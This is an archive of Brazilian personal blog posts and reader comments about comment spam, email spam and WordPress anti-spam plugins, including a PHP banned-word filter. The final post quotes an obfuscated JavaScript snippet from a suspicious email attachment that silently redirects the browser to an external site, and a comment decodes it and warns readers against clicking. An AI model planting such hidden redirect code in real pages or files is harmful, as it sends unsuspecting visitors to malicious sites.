SPAM bizarro vindo da China

Há algumas semanas este blog vem sendo bombardeado por pelo menos 30 mensagens diárias deste tipo:

Nome: mtfntyzcr

URL: gm0xq24iolpfxtp719349n9d06g501c5s.org

email: lidzshp@outlook.com

Mensagem:

A estrutura da mensagem é sempre a mesma. Primeira linha com o nome do meu blog e as outras três linhas são três formas diferentes de indicar o mesmo link. O “bizarro” é que em todos os SPAMs os domínios são diferentes e aparentemente nenhum deles existe. Nome e email seguem sempre o mesmo padrão aleatório. Mas o endereço é sempre de outlook.com.

O Akismet sempre direcionou tudo para a caixa de SPAM, mas como isso estava entulhando a caixa com mais de 300 comentários semanais decidi reativar o plugin de bloqueio Stop Spammers para barrar isso antes mesmo de entrar no meu sistema. Mas até o Stop Spammers se mostrou incapaz de detectar automaticamente, possivelmente porque eu desativei o bloqueio por IP para não barrar ninguém só por usar o IP que foi usado por um spammer. Então eu dei uma olhada nos IPs e descobri que são muitos, diferentes, mas que a maior parte é da China, com alguns da Coréia, Taiwan e Jakarta. Configurei o Stop Spammers para bloquear comentários vindos da China e agora só estão passando mesmo esses poucos de outros países.

Mas qual seria o propósito de um SPAM desses se é ilegível e nenhum link é válido?

6 comentários
  • Saulo Benigno - 279 Comentários

    Eu usava o plugin Bad Behavior antigamente, ja bloqueava os bots antes de irem escrever os spam.

    https://br.wordpress.org/plugins/bad-behavior/

    É a mesma coisa do Stop Spammers? Não tem nada que bloqueie direto o acesso ao invés de ficar entupindo de besteira?

    • Jefferson - 6.543 Comentários

      É a mesma coisa do Stop Spammers?

      Nunca usei o Bad Behavior. Mas parece seguir o mesmo princípio.

      Não tem nada que bloqueie direto o acesso ao invés de ficar entupindo de besteira?

      O objetivo do Stop Spammers é esse. Descartar a mensagem sem nem ir pro SPAM.

  • Marcel - 67 Comentários

    O objetivo é exatamente esse: detectar um blog vulnerável. Se não for, nada vai aparecer, mas se for, possivelmente tenha uma outra ação.

    • Jefferson - 6.543 Comentários

      Eu não creio que seja isso. O spammer vem todos os dias e tenta postar comentários cinco vezes ou mais na mesma página. Ele está fazendo isso em apenas um punhado das minhas 1754 páginas. Ele não está procurando uma vulnerabilidade no blog. É mais fácil estar procurando uma na minha paciência.

  • Jefferson - 6.543 Comentários

    Com o meu bloqueio o spammer parece ter aumentado as tentativas. 10 comentários diários (dá 300 mensais) ainda estão passando pelo bloqueio e caindo na caixa de SPAM pois nem todos os IPs da China são bloqueados pelo Stop Spammers.

    Decidi reativar o bloqueio por IP do plugin, que usa a lista do Akismet, para ver o que acontece.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

O curioso SPAM da HBO

Isso foi postado como comentário hoje no meu post intitulado Minhas impressões sobre Game of Thrones S07E04

Obrigado pelas impressões

Ninguém pode negar definitivamente o sucesso do Game of Thrones, estou surpreso toda a produção por trás da série. No começo eu não estava convencido de que ela, mas como a história progrediu, eu realmente se tornou um fã. Esta nova temporada parece muito emocionante aqui: http://br.hbomax.tv/serie/Game-of-Thrones-Temporada-07-/501441 I compartilhar os horarios. Sucesso está assegurado. Eu amo o elenco.

Eu quase achei que fosse um comentário legítimo, mas aí o português capenga, certamente fruto de tradutor automático, me chamou a atenção. Primeiro eu fui checar se br.hbomax.tv era um site seguro e aparentemente é um dos vários sites “legítimos”[1] da HBO. Depois eu fui checar se o número no final do URL era um identificador e me dei conta que isso só é importante em SPAM enviado por email. Aí eu usei uma expressão usada no texto para buscar se isso havia sido postado em outros lugares e, sim, trata-se de um spammer. O mais engraçado é ver algumas pessoas não se darem conta da estranheza do texto e tentarem interagir com o spam. A falta de senso crítico de algumas pessoas (tá bom, da maioria da população) é realmente extraordinária.



Uma das “personas” do SPAM tem até perfil no Facebook com 91 “amigos”. Outra não tem nenhum até agora mas também tem um perfil no Google+. Isso parece ser coisa da agência de propaganda responsável pelo domínio tentando aumentar o número de visitas deste. Não deve ser um bot, porque o “Obrigado pelas impressões” iria requerer um bot com uma inteligência que nunca vi e os outros comentários do spammer confirmam que ele tem alguma compreensão do conteúdo dos posts. Meu palpite é que seja uma pessoa ou grupo manualmente adicionando comentários “personalizados” em blogs.

O que vocês acham?

 

[1] Quem me acompanha de perto sabe o que penso desse hábito de manter vários domínios “legítimos” diferentes.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

Testando o plugin Stop Spammer Registrations

Apesar do nome, esse plugin também atua sobre comentários e tem um modo de operação bem amplo e radical. Se você, leitor, não estiver conseguindo mais postar comentários, por favor me avise com um comentário no Geringonças e Gambiarras dizendo qual browser, nome de usuário e email que você está usando. O plugin bloqueia também por IP, o que pode ser um problema, já que a maioria usa IP não-fixo para navegar na internet e pode pegar um IP que tenha sido usado anteriormente por um spammer e esteja em uma blacklist. Como sobrou muito pouco spam depois  que implementei o script de palavras proibidas, eu desliguei a opção de checar o IP.

O plugin também tem a opção de bloquear pela ausência do campo HTTP REFERER, o que supostamente indicaria que o spammer não está submetendo o form de comentários através do meu site. Porém dando uma olhada na lista de comentários eu constatei que um monte de comentários legítimos, de Luciano, Walter, Marcel, etc., estão vindo também com o REFERER em branco, por isso eu desliguei essa opção também.

Esse plugin bloqueia o spammer de forma que o comentário ou registro sequer seja feito. Nada de colocar na caixa de spam para eu ter que perder meu tempo analisando depois.

Eu achei esse plugin especialmente interesante por causa dessas características:

  • Bloqueia também registros falsos. Coisa que o Akismet não faz;
  • Coloca um falso formulário inteiro de comentário em cada página. Esse formulário só pode ser visto pelos bots. Se um formulário desses for submetido, o IP é imediatamente considerado hostil e bloqueado (isso independe do bloqueio por IP que eu desliguei, que é baseado em blacklists);
  • Oferece uma blacklist de palavras que se usadas no nome ou email provocam o bloqueio imediato. Eu não creio que um leitor vá usar as palavras “viagra”, “captcha” e “penis” nesses campos, mas spammers usam. O Akismet detecta isso mas joga na caixa de spam e não vejo sentido em armazenar isso se é claramente hostil;

Está em teste. Será desligado se criar problemas para os meus leitores.

12 comentários
  • Walter R. Gomes - 140 Comentários

    Só pra testar, então.

  • Luciano - 476 Comentários

    Testando também, pra ver se passa sem falso positivo.

  • Jefferson - 6.543 Comentários

    Apesar de estar com os bloqueios por IP e REFERER desligados, o plugin reporta ter bloqueado 183 spammers em menos de 24h. Passaram UM spam (apanhdo pelo Akismet) e UM registro falso.

    Segundo os logs, quase todos caíram por preencherem o falso formulário. E a maioria do hits foi do spammer brasileiro que eu já tinha bloqueado usando o script de palavras banidas.

     

  • Luciano - 476 Comentários

    Aqui a situação esta assim usando o AVH First Defense Against Span (doravante o chamarei de AVH):

    272 Spam stopped in 2012 – dezembro
    Checking with Stop Forum Spam and Spamhaus
    IP Cache Statistics
    314 Total of IP’s in the cache
    299 Total of IP’s classified as ham
    15 Total of IP’s classified as spam

    Ele + Akismet + Script melhorado (vou postar depois) = Spam na fila de moderação: Zero!

    Vou deixar mais um pouco pra ver se zerou mesmo, e ai se sim, vou desligar o reCaptcha e ver como se comporta.

  • VR5 - 397 Comentários

    Jefferson & demais colegas: mesmo sendo um off-topic, desejo a todos sinceros votos de Feliz Natal e um Próspero 2013!!! :)

  • Luciano - 476 Comentários

    Jefferson, só pra constar, depois de ter instalado o AVH aqui + o script melhorado (vigando os outros campos) o SPAM ZEROU! Já tem mais de 3 semanas que não cai mais nenhum na lista de moderação.

    O log do AVH esta assim:

    995 Spam stopped in 2013 – janeiro
    5711 Spam stopped in 2012 – dezembro

    Checking with Stop Forum Spam and Spamhaus

    IP Cache Statistics

    IP caching is enabled
    1374 Total of IP’s in the cache
    1311 Total of IP’s classified as ham
    63 Total of IP’s classified as spam

    Só posso pular de algria! (obs, a inserção de smile não tá funcionando, não sei se é bug aqui ou no blog, verifique, por favor)

  • Jefferson - 6.543 Comentários

    (obs, a inserção de smile não tá funcionando, não sei se é bug aqui ou no blog, verifique, por favor)

     

    Caramba, Luciano, desculpe a demora para responder. O_o

    Mas aparentemente está funcionando :)

  • Luciano - 476 Comentários

    Jefferson, requentando o tópico. Só pra informar.

    No mês de Março, com o meu trio “cata spammer pelos fundilhos e mete o pé na bunda” eu consegui finalmente ZERAR o spam!

    Digo isso pelo seguinte, verificando o gráfico do akismet, temos o seguinte:

    Janeiro: 35
    Fevereiro: 13
    Março: 0
    Abril: 0 (por enquanto)

    Ah… você disse que teve probelmas pra comentar no meu blog, verifiquei e realmente esta com pau. O problema era que o script que esta cuidando do spam, não aceitava deixar campos em branco quando em busca parcial por conteudo proibido. Mas resolvi, coloquei uma checagem pra ver se o campo quando em checagem parcial esta em branco, se sim, pula a verificação com strstr que não pode usar valor vazio.

  • Jefferson - 6.543 Comentários

    Depois de um ano e meio ainda estou satisfeito com o funcionamento do plugin. Eu praticamente não tenho mais problemas com SPAM. Somente fui olhar agora porque uma onda de SPAM atingiu todos os meus blogs e passou tanto pelo plugin quanto pelo akismet e ficou preso na última linha de defesa: a fila de moderação. Fui checar o funcionamento e em uma das instalações apenas 20 SPAMs estavam na caixa do Akismet e o plugin reporta ter bloqueado 16828 tentativas desde a instalação.

    O SPAM que está passando está usando uma técnica nova, que torna o texto aleatório através da corrupção das palavras.

  • Jefferson - 6.543 Comentários

    O plugin agora se chama “Stop Spammers Spam Prevention” e está bem mais complexo. Houve pelo menos uma adição importante desde a última vez que olhei: o plugin agora pode mandar um email para você sempre que alguém for barrado e pedir para entrar na whitelist. Antes era preciso ficar consultando o log do plugin para ver isso.

  • Jefferson - 6.543 Comentários

    O nome do plugin foi alterado há algum tempo para simplesmente “STOP Spammers”

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

Como vetar / deletar automaticamente spam no wordpress

Não, eu não estou falando de mandar para a caixa de spam. Isso o Akismet já faz muito bem. O que eu vou explicar aqui bloqueia o comentário no momento em que está sendo postado, antes mesmo de passar pelo Akismet.

Nos últimos meses tenho sido bombardeado por milhares de comentários de spam mensais que provavelmente vem do mesmo spammer, divulgando uma dúzia de sites de mala direta (que hoje é sinônimo de spam). Vejam neste blog um exemplo de como esse spammer se comporta. A página recebeu 65 comentários e todos seguem o mesmo padrão.

A predominância desse spammer é tão grande que eu acabo de apagar cerca de 1600 spams, filtrando pelos nomes desses sites, e só restaram uns dez que nada tinham a ver com eles. Ou seja: se eu conseguisse barrar a postagem da propaganda dessa dúzia de sites, minha caixa de spam estaria sempre razoavelmente limpa.

Eu fiz uma pesquisa semanas atrás e não consegui achar nenhum plugin que fizesse isso. Todos os plugins que encontrei limitam-se a jogar mensagens para a caixa de spam. E isso o akismet já faz. Mas com milhares de mensagens que são indubitavelmente spam na caixa, você fica praticamente impossibilitado de detectar as mensagens que cairam lá acidentalmente.

Hoje, depois de ficar de saco cheio por ter que filtrar e apagar essas mensagens de novo, quando “não custaria nada” ao wordpress checar uma lista de doze palavras, fiz uma nova busca e encontrei a solução.

Não é tão simples quanto instalar um plugin, mas também não é nada difícil. Aqui está o código adaptado para as minhas necessidades:


//Acrescente isso no final de functions.php (é um arquivo do tema, não do wordpress)
//pode ser imediatamente antes da linha final com um "?>".
function in_comment_post_like($string, $array) {
foreach($array as $ref) { if(strstr($string, $ref)) { return true; } }
return false;
}
function drop_bad_comments() {
if (!empty($_POST['comment'])) {
$post_comment_content = $_POST['comment'];
$lower_case_comment = strtolower($_POST['comment']);

// Lista de palavras banidas.
// Comentários com essas palavras serão automaticamente deletados
// e quem postou, se não for um bot, verá um alerta.
$bad_comment_content = array(
'viagra',
'hydrocodone',
'xanax',
'tramadol',
'lorazepam',
'adderall',
'dexadrine',
'no prescription',
'oxycontin',
'without a prescription',
'sex pics',
'family incest',
'online casinos',
'online dating',
'cialis',
'ecadastro.com.br',
'seomaster.com',
'divulgaemail.com',
'listadeemails.com',
'casaemail.com.br',
'acertemail.com',
'maladiretasegmentada.com.br',
'busquemail.com.br',
'boliche.com.br',
'kitsucesso.com',
'emailsvip.com.br',
'kitdeemail.com',
'amoxicillin'
);

if (in_comment_post_like($lower_case_comment, $bad_comment_content)) {
wp_die( __('Seu comentário contém palavras ou expressões banidas.') );
}
}
}
add_action('init', 'drop_bad_comments');

O que achei especialmente interessante é que se um humano colocar uma dessas palavras em um comentário legítimo (“viagra” é um exemplo), seu comentário não vai se perder no vazio, porque o script vai responder com “Seu comentário contém palavras ou expressões banidas.”, bastando então clicar no botão Voltar do browser para poder editar o comentário. O script nem tenta dizer o que o gatilhou, entretanto.

Pode testar à vontade. Tente postar um comentário com uma dessas palavras e veja o que acontece.

Nesta outra página você encontrará uma versão mais elaborada, que faz um log no servidor de cada tentativa, com texto, IP, etc.

OBS.: Faça um backup de functions.php antes de fazer qualquer mudança. Uma simples vírgula que você esqueça de colocar pode fazer você perder o acesso ao blog. Aconteceu comigo e fui obrigado a transferir um backup que eu tinha do arquivo por FTP, porque o editor do wordpress não funcionava mais.

Edit: é claro que eu poderia usar um captcha, mas isso acaba enchendo o saco dos leitores legítimos.

12 comentários
  • Luciano - 476 Comentários

    Legal o script, vou testar e se tiver alguma mod interessante eu publico também ok?
     
    Quanto ao captcha, eu tenho uma péssima noticia. Apesar de eu usar o reCatpcha no meu blog, ainda assim passam algumas mensagens de spam.
     
    Logo concluo que: A) os spammers acharam um jeito de burlar o reCaptcha. B) Existe algum furo no wordpress C) já existe algum robot com um bom OCR que acerta alguns captchas.
     
    Um detalhe interessante, nos últimos 4 meses, a taxa de spam aumentou assustadoramente no meu blog.

  • Jefferson - 6.543 Comentários

    Acabo de encontrar um problema no script. A presença da palavra “cialis” veta comentários com a palavra “especialista”. Recomendo a remoção dessa palavra da lista ou a troca por algo menos genérico como “buy cialis”.

    Acho que o script precisa de uma versão mais específica, que não crie esse tipo de problema.

  • Luciano - 476 Comentários

    Pode ser feita uma gambiarra temporária… acrescente um espaço antes da palavra, ‘ cialis’, assim pelo menos não pega especialista, e a bendita palavra pelo menos na maioria das vezes ela sempre virá precedida de outra, e o espaço vai encaixar.
     
    Mas eu vou dar uma olhada se dá pra modificar esse script pra pegar as palavras exatas, talvez precise usar RegEx pra isso.

  • […] Jefferson fez este post com um script (que ele encontrou) que ajuda a matar uma boa parte do SPAM no […]

  • Luciano - 476 Comentários

    Jefferson, consertei o script para não confundir “especialista” com “cialis”.
     
    Veja aqui como ficou: http://www.crashcomputer.caetano.eng.br/?p=3914
     
    :-P

  • Jefferson - 6.543 Comentários

    Encontrei outro problema com o script. Se você usa Firefox, tem a oportunidade de clicar no botão Voltar para editar o que você escreveu, mas no IE o conteúdo do form é perdido. Um usuário legítimo pode ficar muito frustrado ao ver que tudo que ele escreveu se perdeu por causa de uma palavra.

    Talvez seja bom fazer o script exibir todo o texto do comentário abaixo do aviso de que houve uma palavra banida. Vou experimentar com isso.

    Eu sei que o IE é um lixo mas até mesmo quem o despreza como eu às vezes se vê usando-o por diversas razões. Não dá para ignorar sua onipresença.

  • Luciano - 476 Comentários

    Eu normalmente daria uma banana pra quem usa a m$3d@ do IE. Mas… como foi você que pediu, modifiquei o script pra cuspir o comentário junto com a mensagem de alerta.
     
    Porem, eu acho que os usuários legítimos não verão esta tela não… afinal a lista de palavras proibidas não faz parte do vocabulário dos que comentam por aqui e nem lá no meu, né? :-P

    • Jefferson - 6.543 Comentários

      Pois aconteceu comigo no seu blog. No comentário onde escrevi “c1alis” ou “c.ialis”, eu havia escrito também a palavra sem obfuscar. Se não estivesse usando o Firefox teria perdido todo o comentário, que era grandinho.

      E eu pretendo aumentar a lista com expressões como “online shop” e “porn video” que eventualmente podem ser usadas por leitores legítimos do meu blog. São casos raros, mas não são impossíveis.

  • […] one came from the excellent Jefferson Ryan: Como vetar / deletar automaticamente spam no wordpress (in […]

  • Luciano - 476 Comentários

    Bom… eu encontrei um jeito simples e fácil de inserir um campo no form de comentários, que DEVE ser deixado em branco para comentar, se preencher, recusa comentário com a mesma atitude que uma palavra proibida.
     
    O bom disso é que inseri essa função no script de palavras proibidas, de forma que basta inserir um campo novo no formulário.
     
    No meu caso, eu coloquei um campo visível (sem o atributo hidden), com largura de um caractere, mas sem limite de caracteres para o preenchimento.
     
    Agora vem uma questão que gostaria de discutir com você e outras pessoas, como deixar esse campo no form. Pensei em dois jeitos:
     
    1) formatar o campo com  CSS para que ele fique da mesma cor de fundo da página de comentários, dessa forma ele fica “invisível” a humanos, mas não a robôs.
     
    2) deixar o campo visível, com a mesma formatação dos demais, e colocar um label algo como: Se você não é um robô, não preencha este campo.
     
    Em ambos os casos, colocar também um tabindex maior do que o ultimo elemento do form de comentário, no caso o botão “postar comentário”. Assim mesmo que um humano use TAB para avançar os campos, ele não vai cair nesse campo, a menos que dê um TAB a mais do que o necessário para chegar ao botão.
     
    Qual será a melhor forma na sua opinião? No meu blog, provisóriamente, deixei o campo com uma borda cinza, para quem quiser testar comentar preenchendo o campo que não deve ser preenchido. :-P

  • Jefferson - 6.543 Comentários

    O problema com a palavra “especialista” é chamado de Scunthorpe Problem.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

[BUZZ] O spammer Panfleto Virtual me manda até cinco SPAMs diários

Sozinho o spammer Panfleto Virtual é responsável por me mandar até cinco SPAMs diários, devidamente filtrados pelo gmail.

http://www.panfletovirtual.com/

Mas o que ainda me surpreende é que a lista de empresas grandes recifenses que financiam a atividade desse spammer não pára de crescer. Dei uma olhada agora na minha caixa de SPAM e a Panfleto Virtual tem mandado propaganda indesejável em nome de:

Walmart
Ampla Brasil
Faculdade Maurício de Nassau
FACIPE
FAFIRE

Os administradores dessas contas de publicidade deveriam ter um pouco mais de juízo ou vergonha na cara.

Eu me descadastrei hoje do Panfleto Virtual, clicando no link fornecido por ele. Vamos ver se pelo menos isso o spammer respeita.

2 comentários
  • Jefferson - 6.543 Comentários

    Lembrando que a Panfleto Virtual tem me mandado SPAM há mais de um ano.
    http://www.google.com/buzz/117578158927571476541/Pubsx23fDTj

    Só o número de financiadores recifenses do spammer é que tem crescido.

  • Eu recebo também, um monte, com nomes de empresas grandes, como walmart, ponto frio, entre outros, todos indicando promoções. O que o yahoo já direciona pra pasta de spam, porque aprendeu que quando o assunto acrescenta "parceiro yeah", deve mandar pro devido lugar. Já tentei me descadastrar desse site de parcerias, mas acabei caindo em outra lista, de outro site de parcerias. Deixei de olhar, mas tenho quase certeza que são todas do mesmo grupo.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

[BUZZ] Editora Abril fazendo SPAM

Esta semana eu comecei a receber e-mails promocionais da Revista VEJA na minha conta Hotmail. Mas eu nunca divulguei esse e-mail para além das 15 pessoas da minha lista.

Posso afirmar, sem nenhuma sombra de dúvida, que a Abril obteve meu endereço sem minha permissão.


Liked by: Carlos Augusto

6 comentários
  • A Veja já está no meu filtro de Spam há muito tempo. E não adianta nem reclamar que eles não tiram o nosso nome de sua lista de jeito nenhum.

  • Da Abril, eu recebo a mesma mensagem 3 vezes, todo dia. Não entendo como essas listas da Abril são tão não sincronizadas… E como mencionado, não adianta desligar pelo link do email… parece a música do Raul sobre a mosca na sopa..

  • Jefferson… sei não heim? Eu tenho um caso que corre justamente o contrário. Veja:

    Eu criei a uns 2 ou 3 anos, uma conta no gmail para usar como backup incremental de arquivos importantes (código fonte de microcontrolador), layout de placas e fotos importantes.

    O endereço de email desta conta é algo… esdruxulo e indecorável. O nome de usuário é composto de 26 caracteres, misturando letras, números e ponto.

    Ninguém alem de mim, tem o endereço deste e-mail. Eu o guardo a sete chaves e não conto o endereço nem sob tortura.

    Sabe quantos spams eu recebi neste tempo? ZERO! NADA!

    Pode apostar que uma destas 15 pessoas da sua lista vazou seu e-mail de alguma forma, mesmo sem querer, saber ou mesmo um provável worm/vírus, daqueles que forja e-mail com copia para dezenas de destinatários, com algum arquivo infectado.

    Eu penso que até pode existir algum tipo de worm, que se instala na maquina dos mais afoitos, unicamente com a finalidade de capturar o catalogo de endereços e enviar para algum "colecionador" de e-mails.

    Afinal, essas listas com zilhares de e-mails validos tem valor no mercado, se não tivesse, a gente não recebia spam.

  • Jefferson - 6.543 Comentários

    Luciano,

    Eu não tenho nenhuma dúvida de que foi um dos meus 15 "amigos" que "delatou" meu endereço, de uma forma ou de outra. Eu já estava pensando nisso quando escrevi este post, senão teria escrito algo como "Hotmail vendendo dados de contas para a Abril fazer SPAM"

    Possivelmente foi a minha irmã. Antes do SPAM da Veja eu passei a receber e-mails da promoção "Avião do Faustão" sem nunca ter me inscrito na Procter & Gamble. E eu sei que minha irmã está inscrita. Somente por conta disso eu não reclamei da P&G também, pois provavelmente minha irmã colocou meu endereço voluntariamente, por alguma razão.

    Já no caso de Veja… naahhhh… O máximo que minha irmã lê (ou lia) é a Revista VIP. E isso porque pegava comigo.

  • Jefferson - 6.543 Comentários

    É pior do que eu pensava.

    Tentei me descadastrar agora. Para o meu espanto, eu preciso ser cadastrado e ter um "Abril ID" para poder me descadastrar da newsletter!!!!

  • Os spams desta editora estão entre os mais estúpidos (no sentido de grosseria) que já vi. Sempre é um nome diferente do outro quem envia os e-mails, sempre para uma revista diferente. Exame, Veja, Superinteressante e por aí vai. Parece ser uma tentativa clara de evitar caírem nos filtros anti-spam – alguns até passam pelo SpamGuard do Yahoo! e são prontamente blacklisted.

    Já fui assinante de revistas desta editora anos atrás e hoje não tenho o mínimo interesse. Esse marketing esdrúxulo deles faz o interesse ficar menor ainda. Estão todos assinalados como spam e deleto tudo só de ler o cabeçalho e ver que são deles. Viraram praga, sem dúvida são o pior "spam institucional" que já tive o desprazer de receber.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

[BUZZ] A Submarino parece estar sendo promíscua com seu cadastro.

A Submarino parece estar sendo promíscua com seu cadastro.

Acabo de receber um e-mail da Dell, por um endereço que só a Submarino sabia.

Lembrando a todos: como eu tenho um domínio, posso me dar ao luxo de dar um endereço de e-mail diferente para cada pessoa ou empresa.

3 comentários
Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

[BUZZ] Nas últimas 24h já bloqueei dois “seguidores” que não queriam me seguir

Nas últimas 24h já bloqueei dois "seguidores" que evidentemente só queriam que eu os seguisse em retribuição. Não quero ninguém aqui que não esteja realmente interessado no que eu escrevo, só para engordar meus números.

Aliás, eu acho isso no mínimo anti-ético. Declarar afinidade com uma pessoa com o único intuito que ela declare afinidade por você em troca.

18 comentários
Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

[BUZZ] http://www.panfletovirtual.com é um spammer.

http://www.panfletovirtual.com é um spammer.

Até aí, nenhuma novidade. Spammers existem às centenas. O diferencial deste é que conseguiu iludir empresas grandes e famosas no Recife como a Ferreira Costa

http://www.ferreiracosta.com/

e a FAFIRE.

http://www.fafire.br/

Como eu posso afirmar que se trata de SPAM? Muuuuito simples. O endereço de e-mail que eles estão usando é um que eu jamais forneço a empresas, mas que aparecia, de forma cifrada (só humanos entendiam), no meu site pessoal, associado à minha cidade. E todo SPAM que recebo deles (39 mensagens no último mês) é para pessoas de Recife. Logo eu sei exatamente onde eles pegaram o e-mail. E lá ainda existia um aviso desautorizando qualquer contato que não fosse pessoal.

É gente sem nenhuma ética. E como quem contrata spammer é spammer, Ferreira Costa e Fafire entram para a minha lista das empresas sem ética no Recife.

Clique para comentar
(Prefira clicar em "Responder" se estiver comentando um comentário)

Deixe um comentário

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »

[BUZZ] Até clicar em arquivos HTML está perigoso

Hoje eu recebi duas mensagens muito estranhas, que passaram pelo filtro do Gmail, com um anexo em HTML. Visualizando o anexo no Google Docs parecia perfeitamente “seguro”, mas eu sabia que se tratava de alguma pilantragem. Salvei o anexo no HDD e dei uma olhada no código fonte.

Entre uma frase e outra visível, isso estava escondido:

<script>if(frames){if(top.frames.length>0)top.location.href=self.location;}</script><script language=JavaScript>document.write(unescape(‘%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A’))</script>

Eu não tive paciência para decodificar tudo, mas se você tiver alguma noção de caracteres de escape e olhar com cuidado após “unescape” verá que isso começa injetando no browser “<meta http equiv refresh…”

Ou seja, é pilantragem mesmo. Não sei ainda o objetivo, mas até clicar em arquivos html está perigoso.


Liked by: Henzo M. F. Gomes, Roberto Acioli

2 comentários
  • Jefferson - 6.543 Comentários

    Descobri como "ler" o que está escrito aí sem esforço. Basta colar o texto de unescape nesta página:

    http://www.linkedresources.com/tools/unescaper_v0.2b1.html

    E clicar em unescape. O resultado é este (não clique nos links!):

    <meta http-equiv="refresh" content="0;url=http://graduationoutfitters.co.za/1.html" />

    <table width="100%" border="0"><tr bgcolor="#556688" align="center"><td><a href="http://www.pullsoft.com/htmlpower.htm"><font face="Arial, Helvetica, sans-serif" color="#FFFFFF" size="-1">This Web Page was protected by HTMLPower, Click here to Register</font></a></td></tr></table>

    O engraçado é que tudo dentro de <table> </table> parece ter sido inserido por acidente. Script-kiddie em ação?

    Fazer seu browser dar um refresh e abrir "graduationoutfitters.co.za" (não clique!) é que é a parte perigosa da coisa.

  • eu recebi um email do google ferramentas para webmaster que um site meu bem antigo tinha sido infectado, e o código também estava desse jeito, veja:

